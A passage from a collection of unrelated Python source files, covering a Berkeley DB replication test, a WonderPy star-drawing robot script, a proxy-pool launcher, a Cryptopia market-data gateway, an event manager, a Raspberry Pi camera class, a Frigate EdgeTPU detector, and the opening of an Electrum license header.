self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v is None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v is None :
time.sleep(0.02)
# If startup did not happen before the timeout above, then this test
# sometimes fails. This happens randomly, which causes buildbot
# instability, but all the other bsddb tests pass. Since bsddb3 in the
# stdlib is currently not getting active maintenance, and is gone in
# py3k, we just skip the end of the test in that case.
if time.time()>=timeout and startup_timeout:
self.skipTest("replication test skipped due to random failure, "
"see issue 3892")
self.assertTrue(time.time()<timeout)
self.assertEqual("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v is not None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v is None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEqual(None, v)
class DBBaseReplication(DBReplication) :
def setUp(self) :
DBReplication.setUp(self)
def confirmed_master(a,b,c) :
if (b == db.DB_EVENT_REP_MASTER) or (b == db.DB_EVENT_REP_ELECTED) :
self.confirmed_master = True
def client_startupdone(a,b,c) :
if b == db.DB_EVENT_REP_STARTUPDONE :
self.client_startupdone = True
self.dbenvMaster.set_event_notify(confirmed_master)
self.dbenvClient.set_event_notify(client_startupdone)
import Queue
self.m2c = Queue.Queue()
self.c2m = Queue.Queue()
# There are only two nodes, so we don't need to
# do any routing decision
def m2c(dbenv, control, rec, lsnp, envid, flags) :
self.m2c.put((control, rec))
def c2m(dbenv, control, rec, lsnp, envid, flags) :
self.c2m.put((control, rec))
self.dbenvMaster.rep_set_transport(13,m2c)
self.dbenvMaster.rep_set_priority(10)
self.dbenvClient.rep_set_transport(3,c2m)
self.dbenvClient.rep_set_priority(0)
self.assertEqual(self.dbenvMaster.rep_get_priority(),10)
self.assertEqual(self.dbenvClient.rep_get_priority(),0)
#self.dbenvMaster.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvMaster.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
#self.dbenvClient.set_verbose(db.DB_VERB_REPLICATION, True)
#self.dbenvClient.set_verbose(db.DB_VERB_FILEOPS_ALL, True)
def thread_master() :
return self.thread_do(self.dbenvMaster, self.c2m, 3,
self.master_doing_election, True)
def thread_client() :
return self.thread_do(self.dbenvClient, self.m2c, 13,
self.client_doing_election, False)
from threading import Thread
t_m=Thread(target=thread_master)
t_c=Thread(target=thread_client)
import sys
if sys.version_info[0] < 3 :
t_m.setDaemon(True)
t_c.setDaemon(True)
else :
t_m.daemon = True
t_c.daemon = True
self.t_m = t_m
self.t_c = t_c
self.dbMaster = self.dbClient = None
self.master_doing_election=[False]
self.client_doing_election=[False]
def tearDown(self):
if self.dbClient :
self.dbClient.close()
if self.dbMaster :
self.dbMaster.close()
self.m2c.put(None)
self.c2m.put(None)
self.t_m.join()
self.t_c.join()
# Here we assign dummy event handlers to allow GC of the test object.
# Since the dummy handler doesn't use any outer scope variable, it
# doesn't keep any reference to the test object.
def dummy(*args) :
pass
self.dbenvMaster.set_event_notify(dummy)
self.dbenvClient.set_event_notify(dummy)
self.dbenvMaster.rep_set_transport(13,dummy)
self.dbenvClient.rep_set_transport(3,dummy)
self.dbenvClient.close()
self.dbenvMaster.close()
test_support.rmtree(self.homeDirClient)
test_support.rmtree(self.homeDirMaster)
def basic_rep_threading(self) :
self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v is None : return
env.rep_process_message(v[0], v[1], envid)
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
def test01_basic_replication(self) :
self.basic_rep_threading()
# The timeout is necessary in BDB 4.5, since DB_EVENT_REP_STARTUPDONE
# is not generated if the master has no new transactions.
# This is solved in BDB 4.6 (#15542).
import time
timeout = time.time()+60
while (time.time()<timeout) and not (self.confirmed_master and
self.client_startupdone) :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.dbMaster=db.DB(self.dbenvMaster)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.open("test", db.DB_HASH, db.DB_CREATE, 0666, txn=txn)
txn.commit()
import time,os.path
timeout=time.time()+10
while (time.time()<timeout) and \
not (os.path.exists(os.path.join(self.homeDirClient,"test"))) :
time.sleep(0.01)
self.dbClient=db.DB(self.dbenvClient)
while True :
txn=self.dbenvClient.txn_begin()
try :
self.dbClient.open("test", db.DB_HASH, flags=db.DB_RDONLY,
mode=0666, txn=txn)
except db.DBRepHandleDeadError :
txn.abort()
self.dbClient.close()
self.dbClient=db.DB(self.dbenvClient)
continue
txn.commit()
break
d = self.dbenvMaster.rep_stat(flags=db.DB_STAT_CLEAR);
self.assertTrue("master_changes" in d)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.put("ABC", "123", txn=txn)
txn.commit()
import time
timeout=time.time()+10
v=None
while (time.time()<timeout) and (v is None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v is None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEqual("123", v)
txn=self.dbenvMaster.txn_begin()
self.dbMaster.delete("ABC", txn=txn)
txn.commit()
timeout=time.time()+10
while (time.time()<timeout) and (v is not None) :
txn=self.dbenvClient.txn_begin()
v=self.dbClient.get("ABC", txn=txn)
txn.commit()
if v is None :
time.sleep(0.02)
self.assertTrue(time.time()<timeout)
self.assertEqual(None, v)
if db.version() >= (4,7) :
def test02_test_request(self) :
self.basic_rep_threading()
(minimum, maximum) = self.dbenvClient.rep_get_request()
self.dbenvClient.rep_set_request(minimum-1, maximum+1)
self.assertEqual(self.dbenvClient.rep_get_request(),
(minimum-1, maximum+1))
if db.version() >= (4,6) :
def test03_master_election(self) :
# Get ready to hold an election
#self.dbenvMaster.rep_start(flags=db.DB_REP_MASTER)
self.dbenvMaster.rep_start(flags=db.DB_REP_CLIENT)
self.dbenvClient.rep_start(flags=db.DB_REP_CLIENT)
def thread_do(env, q, envid, election_status, must_be_master) :
while True :
v=q.get()
if v is None : return
r = env.rep_process_message(v[0],v[1],envid)
if must_be_master and self.confirmed_master :
self.dbenvMaster.rep_start(flags = db.DB_REP_MASTER)
must_be_master = False
if r[0] == db.DB_REP_HOLDELECTION :
def elect() :
while True :
try :
env.rep_elect(2, 1)
election_status[0] = False
break
except db.DBRepUnavailError :
pass
if not election_status[0] and not self.confirmed_master :
from threading import Thread
election_status[0] = True
t=Thread(target=elect)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.thread_do = thread_do
self.t_m.start()
self.t_c.start()
self.dbenvMaster.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.dbenvClient.rep_set_timeout(db.DB_REP_ELECTION_TIMEOUT, 50000)
self.client_doing_election[0] = True
while True :
try :
self.dbenvClient.rep_elect(2, 1)
self.client_doing_election[0] = False
break
except db.DBRepUnavailError :
pass
self.assertTrue(self.confirmed_master)
# Race condition showed up after upgrading to Solaris 10 Update 10
# https://forums.oracle.com/forums/thread.jspa?messageID=9902860
# jcea@jcea.es: See private email from Paula Bingham (Oracle),
# in 20110929.
while not (self.dbenvClient.rep_stat()["startup_complete"]) :
pass
if db.version() >= (4,7) :
def test04_test_clockskew(self) :
fast, slow = 1234, 1230
self.dbenvMaster.rep_set_clockskew(fast, slow)
self.assertEqual((fast, slow),
self.dbenvMaster.rep_get_clockskew())
self.basic_rep_threading()
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if db.version() >= (4, 6) :
dbenv = db.DBEnv()
try :
dbenv.repmgr_get_ack_policy()
ReplicationManager_available=True
except :
ReplicationManager_available=False
dbenv.close()
del dbenv
if ReplicationManager_available :
suite.addTest(unittest.makeSuite(DBReplicationManager))
if have_threads :
suite.addTest(unittest.makeSuite(DBBaseReplication))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
sketchStars.py
|
from threading import Thread
import WonderPy.core.wwMain
from WonderPy.core.wwConstants import WWRobotConstants
STAR_NUM_POINTS = 5
STAR_EDGE_LENGTH_CM = 50
class MyClass(object):
def on_connect(self, robot):
"""
start threads which emit robot commands based on their own timing, rather than in response to sensor packets.
"""
if not robot.has_ability(WWRobotConstants.WWRobotAbilities.BODY_MOVE, True):
exit(1)
Thread(target=self.async_1, args=(robot,)).start()
def async_1(self, robot):
while True:
print("Press the button!")
robot.block_until_button_main_press_and_release()
print("Resetting the pose global position to origin")
robot.cmds.body.do_pose(0, 0, 0, 0, WWRobotConstants.WWPoseMode.WW_POSE_MODE_SET_GLOBAL)
robot.cmds.accessory.do_sketchkit_pen_down()
global STAR_NUM_POINTS
global STAR_EDGE_LENGTH_CM
self.do_star(robot, STAR_NUM_POINTS, STAR_EDGE_LENGTH_CM)
robot.cmds.accessory.do_sketchkit_pen_up()
def do_star(self, robot, numPoints, edge_length):
if numPoints % 2 == 0:
print("can only do stars with an odd number of points")
return
if numPoints < 3:
print("Need at least 3 points for a star")
turn_deg = 180.0 * (1.0 - 1.0 / numPoints)
half_internal = (180.0 - turn_deg) * 0.5
speed = 20.0
# turn clockwise away from center by half of one full vertex angle
robot.cmds.body.do_pose(0, 0, -half_internal, 0.5, WWRobotConstants.WWPoseMode.WW_POSE_MODE_RELATIVE_COMMAND)
for n in xrange(numPoints):
print("driving to vertex %d" % (n + 1))
robot.cmds.body.do_pose(0, edge_length, 0, edge_length / speed,
WWRobotConstants.WWPoseMode.WW_POSE_MODE_RELATIVE_COMMAND)
# turn counter-clockwise by one vertex angle
td = turn_deg
# if last vertex, turn an additional half vertex angle to restore the original orientation of the robot
if n == numPoints - 1:
td += half_internal
robot.cmds.body.do_pose(0, 0, td, 0.5, WWRobotConstants.WWPoseMode.WW_POSE_MODE_RELATIVE_COMMAND)
if __name__ == "__main__":
WonderPy.core.wwMain.start(MyClass())
|
main.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: main.py
Description : 运行主函数
Author : JHao
date: 2017/4/1
-------------------------------------------------
Change Activity:
2017/4/1:
-------------------------------------------------
"""
__author__ = 'JHao'
import sys
import signal
from multiprocessing import Process
sys.path.append('.')
sys.path.append('..')
from Api.ProxyApi import run as ProxyApiRun
from Schedule.ProxyValidSchedule import run as ValidRun
from Schedule.ProxyRefreshSchedule import run as RefreshRun
def run():
p_list = list()
p1 = Process(target=ProxyApiRun, name='ProxyApiRun')
p_list.append(p1)
p2 = Process(target=ValidRun, name='ValidRun')
p_list.append(p2)
p3 = Process(target=RefreshRun, name='RefreshRun')
p_list.append(p3)
def kill_child_processes(signum, frame):
for p in p_list:
p.terminate()
sys.exit(1)
signal.signal(signal.SIGTERM, kill_child_processes)
for p in p_list:
p.daemon = True
p.start()
for p in p_list:
p.join()
if __name__ == '__main__':
run()
|
cryptopia.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
from threading import Thread
import time
class ExchGwApiCryptopia(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_content_field_name(cls):
return 'Data'
@classmethod
def get_timestamp_offset(cls):
return 1
@classmethod
def get_trades_timestamp_field_name(cls):
return 'Timestamp'
@classmethod
def get_bids_field_name(cls):
return 'Buy'
@classmethod
def get_asks_field_name(cls):
return 'Sell'
@classmethod
def get_order_book_price_field_name(cls):
return 'Price'
@classmethod
def get_order_book_volume_field_name(cls):
return 'Volume'
@classmethod
def get_trade_side_field_name(cls):
return 'Type'
@classmethod
def get_trade_price_field_name(cls):
return 'Price'
@classmethod
def get_trade_volume_field_name(cls):
return 'Amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://www.cryptopia.co.nz/api/GetMarketOrders/%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
return "https://www.cryptopia.co.nz/api/GetMarketHistory/%s" % (instmt.get_instmt_code())
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
if not cls.get_content_field_name() in raw.keys():
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
raw = raw[cls.get_content_field_name()]
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# Date time
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[cls.get_order_book_price_field_name()], reverse=True)
for i in range(0, 5):
l2_depth.bids[i].price = bids[i][cls.get_order_book_price_field_name()]
l2_depth.bids[i].volume = bids[i][cls.get_order_book_volume_field_name()]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[cls.get_order_book_price_field_name()])
for i in range(0, 5):
l2_depth.asks[i].price = asks[i][cls.get_order_book_price_field_name()]
l2_depth.asks[i].volume = asks[i][cls.get_order_book_volume_field_name()]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = Trade.parse_side(raw[cls.get_trade_side_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
# Trade id
trade.trade_id = trade.date_time + '-P' + str(trade.trade_price) + '-V' + str(trade.trade_volume)
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if len(res) > 0 and cls.get_content_field_name() in res.keys():
for t in res[cls.get_content_field_name()]:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwCryptopia(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiCryptopia(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Cryptopia'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if trade.trade_id > instmt.get_exch_trade_id():
instmt.set_exch_trade_id(trade.trade_id)
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = Thread(target=partial(self.get_order_book_worker, instmt))
t2 = Thread(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Cryptopia'
instmt_name = 'DOTBTC'
instmt_code = 'DOT_BTC'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwCryptopia([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
# exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
events.py
|
"""Leaf 事件机制实现"""
import threading
import multiprocessing as mp
from collections import namedtuple
from typing import Optional, List, Callable, NoReturn
from . import modules
from .error import Error
from .wrapper import thread
from .algorithm import Node, Tree
class ReachedMaxReg(Error):
"""达到最大注册数量限制"""
code = 10011
description = "项目达到最大注册数量限制"
class InvalidRootName(Error):
"""非法根节点名称"""
code = 10012
description = "非法根节点名称"
class InvalidEventName(Error):
"""非法事件名称"""
code = 10013
description = "非法事件名称"
class EventNotFound(Error):
"""未找到对应的事件"""
code = 10014
description = "未找到对应的事件"
# 对事件需要被调用的参数进行描述
# args - 按照位置的参数: (int, str, ...)
# kwargs - 按照名称的参数: {"sth1": int, "sth2": str, ...}
Parameters = namedtuple("Parameters", ("args", "kwargs"))
class Event:
"""
事件类:
name - 事件名
hook - 注册回调函数到当前事件
unhook - 取消注册回调函数从当前事件
"""
def __repr__(self) -> str:
"""返回 repr 信息"""
return "<Leaf EventObject '" + self.name + "'>"
def __init__(self, name: str, paras: Parameters,
description: Optional[str] = '',
maximum: Optional[int] = 0):
"""
事件类初始化函数:
parameters - 事件被调用时的参数说明
name - 该事件的类型: 请遵循 Leaf 中事件名称规定
description - 事件说明
maximum - 最大允许注册的回调函数数量: 默认为 0 - 无限
"""
self.__name: str = name
self.__maximum: int = maximum
self.__parameters: Parameters = paras
self.__description: str = description
self.__callbacks: List[Callable] = list()
def __str__(self):
"""str 返回事件的说明"""
return self.__description
@property
def name(self) -> str:
"""返回事件名称"""
return self.__name
@property
def description(self) -> str:
"""返回事件说明"""
return self.__description
def hook(self, function: Callable) -> NoReturn:
"""
注册一个函数到当前的事件:
function: 在事件被触发时可以被调用的任意函数
"""
if (self.__maximum == 0) or (len(self.__callbacks) < self.__maximum):
self.__callbacks.append(function)
else:
raise ReachedMaxReg(
"Reached max registery of event: " + str(self.__maximum))
def unhook(self, function: Callable) -> NoReturn:
"""
从注册事件中删除一个函数:
function: 待删除的函数
*注意: 当未找到对应函数时不会触发错误
"""
if function in self.__callbacks:
self.__callbacks.remove(function)
def boardcast(self, *args, **kwargs) -> NoReturn:
"""
向所有的进程广播触发该事件
经过广播的事件请不要再次在本地 notify
"""
manager: Manager = modules.events
manager.boardcast(self.__name, *args, **kwargs)
@thread
def notify(self, *args, **kwargs) -> NoReturn:
"""
向所有绑定了当前事件的函数发送通知:
传入的所有参数会原封不动的传入被调用函数
函数的返回值将会被丢弃
"""
for function in self.__callbacks:
function(*args, **kwargs)
class Manager:
"""
事件管理 - 根据传入事件名建立事件区域树
请遵循 leaf 事件名规则:
所有的事件需要以 leaf 作为开头
而后的标识符说明自己的功能区域, 如 plugins
之后说明自己的业务名称, 如 access_token
后面添加自定义的事件名, 如 updated
得到的事件名: leaf.plugins.access_token.updated
add - 向管理器中添加一个事件
event - 尝试从指定路径获取一个事件
names - 尝试从指定路径获取子集下的所有事件名称与说明
"""
def __repr__(self) -> str:
"""返回 repr 信息"""
return "<Leaf EventManager '%s'>" % self.__rootname
def __init__(self, rootname: Optional[str] = "leaf",
asyncs: Optional[mp.Queue] = None):
"""
初始化事件管理器:
rootname: 根管理器名称
asyncs: 调度服务器远程事件同步队列
"""
self.__asyncs: mp.Queue = asyncs
self.__rootname: str = rootname
self.__rootnode: Node = Node(rootname)
self.__events_tree: Tree = Tree(self.__rootnode)
# 初始化侦听事件线程
if self.__asyncs:
listener = threading.Thread(target=self.__listen_boardcast)
listener.setDaemon(True)
listener.start()
def __split(self, name: str, splitor: str) -> list:
"""根据指定的分隔符进行分割"""
# 当要获取根节点时
if name == self.__rootname:
return list()
# 检查分隔符是否合法
if not splitor in name:
raise InvalidEventName("需要以 " + splitor + " 分割")
joint: list = name.split(splitor)
# 检查根节点是否合法
if joint.pop(0) != self.__rootname:
raise InvalidRootName("Event root must be " + self.__rootname)
return joint
def __listen_boardcast(self):
"""
不断地尝试从广播的事件同步队列中获取消息
并寻找, 执行对应的事件
"""
while True:
try:
eventname, args, kwargs = self.__asyncs.get()
except EOFError as _error:
break
event = self.event(eventname)
event.notify(*args, **kwargs)
def boardcast(self, eventname: str, *args, **kwargs) -> NoReturn:
"""向所有的进程广播通知触发指定的事件"""
if "manager" in modules.keys():
manager = modules.manager
manager.boardcast(eventname, *args, **kwargs)
# 当远程管理建立失败的时候保证本地执行
else:
event = self.event(eventname)
event.notify(*args, **kwargs)
def add(self, event: Event) -> NoReturn:
"""
向事件管理器中添加事件
event: Event 类型
"""
# 分割事件名及获取根节点
current = self.__rootnode
joint = self.__split(event.name, '.')
# 迭代搜索每一个子节点
for tag in joint:
try:
current = current.find(tag)
except KeyError as _error:
child = Node(tag)
current.add(child)
current = child
# 设置事件作为节点的 value
current.value = event
def event(self, name: str) -> Event:
"""
根据事件名查找对应的事件/事件列:
当给定的名称对应了一个事件时 - 返回该事件
当找不到对应节点时 - 报错
"""
# 分割事件名及获取根节点
joint = self.__split(name, '.')
current = self.__rootnode
# 迭代搜索每一个子节点
for tag in joint:
try:
current = current.find(tag)
except KeyError as _error:
raise EventNotFound("事件 " + name + " 不存在")
# 检查并返回当前节点的事件
if not isinstance(current.value, Event):
raise EventNotFound("事件 " + name + " 不存在")
return current.value
def names(self, name: str) -> dict:
"""
返回对应路径下一级中所有的事件名称与说明:
name("leaf.plugins.access_token") ->
{
"updated": "accesstoken更新之后被调用",
"failed": "accesstoken更新失败之后调用",
"expired": "accesstoken过期之后调用",
...
}
"""
# 分割事件名获取根节点
joint = self.__split(name, '.')
current = self.__rootnode
# 迭代搜索节点
for tag in joint:
try:
current = current.find(tag)
except KeyError as _error:
raise EventNotFound("事件 " + name + " 不存在")
# 返回当前节点下所有节点的信息
result: dict = dict()
children = current.children()
for child in children:
result[child.tag] = str(child.value)
return result
|
camera_pi.py
|
import time
import io
import threading
import picamera
class Camera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
def initialize(self):
if Camera.thread is None:
# start background frame thread
Camera.thread = threading.Thread(target=self._thread)
Camera.thread.start()
# wait until frames start to be available
while self.frame is None:
time.sleep(0)
def get_frame(self):
Camera.last_access = time.time()
self.initialize()
return self.frame
@classmethod
def _thread(cls):
with picamera.PiCamera() as camera:
# camera setup
camera.resolution = (320, 240)
camera.hflip = True
camera.vflip = True
# let camera warm up
camera.start_preview()
time.sleep(2)
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg',
use_video_port=True):
# store frame
stream.seek(0)
cls.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
# if there hasn't been any clients asking for frames in
# the last 10 seconds stop the thread
if time.time() - cls.last_access > 10:
break
cls.thread = None
|
edgetpu.py
|
import os
import datetime
import hashlib
import multiprocessing as mp
import numpy as np
import pyarrow.plasma as plasma
import tflite_runtime.interpreter as tflite
from tflite_runtime.interpreter import load_delegate
from frigate.util import EventsPerSecond, listen
def load_labels(path, encoding='utf-8'):
"""Loads labels from file (with or without index numbers).
Args:
path: path to label file.
encoding: label file encoding.
Returns:
Dictionary mapping indices to labels.
"""
with open(path, 'r', encoding=encoding) as f:
lines = f.readlines()
if not lines:
return {}
if lines[0].split(' ', maxsplit=1)[0].isdigit():
pairs = [line.split(' ', maxsplit=1) for line in lines]
return {int(index): label.strip() for index, label in pairs}
else:
return {index: line.strip() for index, line in enumerate(lines)}
class ObjectDetector():
def __init__(self):
edge_tpu_delegate = None
try:
edge_tpu_delegate = load_delegate('libedgetpu.so.1.0')
except ValueError:
print("No EdgeTPU detected. Falling back to CPU.")
if edge_tpu_delegate is None:
self.interpreter = tflite.Interpreter(
model_path='/cpu_model.tflite')
else:
self.interpreter = tflite.Interpreter(
model_path='/edgetpu_model.tflite',
experimental_delegates=[edge_tpu_delegate])
self.interpreter.allocate_tensors()
self.tensor_input_details = self.interpreter.get_input_details()
self.tensor_output_details = self.interpreter.get_output_details()
def detect_raw(self, tensor_input):
self.interpreter.set_tensor(self.tensor_input_details[0]['index'], tensor_input)
self.interpreter.invoke()
boxes = np.squeeze(self.interpreter.get_tensor(self.tensor_output_details[0]['index']))
label_codes = np.squeeze(self.interpreter.get_tensor(self.tensor_output_details[1]['index']))
scores = np.squeeze(self.interpreter.get_tensor(self.tensor_output_details[2]['index']))
detections = np.zeros((20,6), np.float32)
for i, score in enumerate(scores):
detections[i] = [label_codes[i], score, boxes[i][0], boxes[i][1], boxes[i][2], boxes[i][3]]
return detections
def run_detector(detection_queue, avg_speed, start):
print(f"Starting detection process: {os.getpid()}")
listen()
plasma_client = plasma.connect("/tmp/plasma")
object_detector = ObjectDetector()
while True:
object_id_str = detection_queue.get()
object_id_hash = hashlib.sha1(str.encode(object_id_str))
object_id = plasma.ObjectID(object_id_hash.digest())
object_id_out = plasma.ObjectID(hashlib.sha1(str.encode(f"out-{object_id_str}")).digest())
input_frame = plasma_client.get(object_id, timeout_ms=0)
if input_frame is plasma.ObjectNotAvailable:
continue
# detect and put the output in the plasma store
start.value = datetime.datetime.now().timestamp()
plasma_client.put(object_detector.detect_raw(input_frame), object_id_out)
duration = datetime.datetime.now().timestamp()-start.value
start.value = 0.0
avg_speed.value = (avg_speed.value*9 + duration)/10
class EdgeTPUProcess():
def __init__(self):
self.detection_queue = mp.SimpleQueue()
self.avg_inference_speed = mp.Value('d', 0.01)
self.detection_start = mp.Value('d', 0.0)
self.detect_process = None
self.start_or_restart()
def start_or_restart(self):
self.detection_start.value = 0.0
if (not self.detect_process is None) and self.detect_process.is_alive():
self.detect_process.terminate()
print("Waiting for detection process to exit gracefully...")
self.detect_process.join(timeout=30)
if self.detect_process.exitcode is None:
print("Detection process didnt exit. Force killing...")
self.detect_process.kill()
self.detect_process.join()
self.detect_process = mp.Process(target=run_detector, args=(self.detection_queue, self.avg_inference_speed, self.detection_start))
self.detect_process.daemon = True
self.detect_process.start()
class RemoteObjectDetector():
def __init__(self, name, labels, detection_queue):
self.labels = load_labels(labels)
self.name = name
self.fps = EventsPerSecond()
self.plasma_client = plasma.connect("/tmp/plasma")
self.detection_queue = detection_queue
def detect(self, tensor_input, threshold=.4):
detections = []
now = f"{self.name}-{str(datetime.datetime.now().timestamp())}"
object_id_frame = plasma.ObjectID(hashlib.sha1(str.encode(now)).digest())
object_id_detections = plasma.ObjectID(hashlib.sha1(str.encode(f"out-{now}")).digest())
self.plasma_client.put(tensor_input, object_id_frame)
self.detection_queue.put(now)
raw_detections = self.plasma_client.get(object_id_detections, timeout_ms=10000)
if raw_detections is plasma.ObjectNotAvailable:
self.plasma_client.delete([object_id_frame])
return detections
for d in raw_detections:
if d[1] < threshold:
break
detections.append((
self.labels[int(d[0])],
float(d[1]),
(d[2], d[3], d[4], d[5])
))
self.plasma_client.delete([object_id_frame, object_id_detections])
self.fps.update()
return detections
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
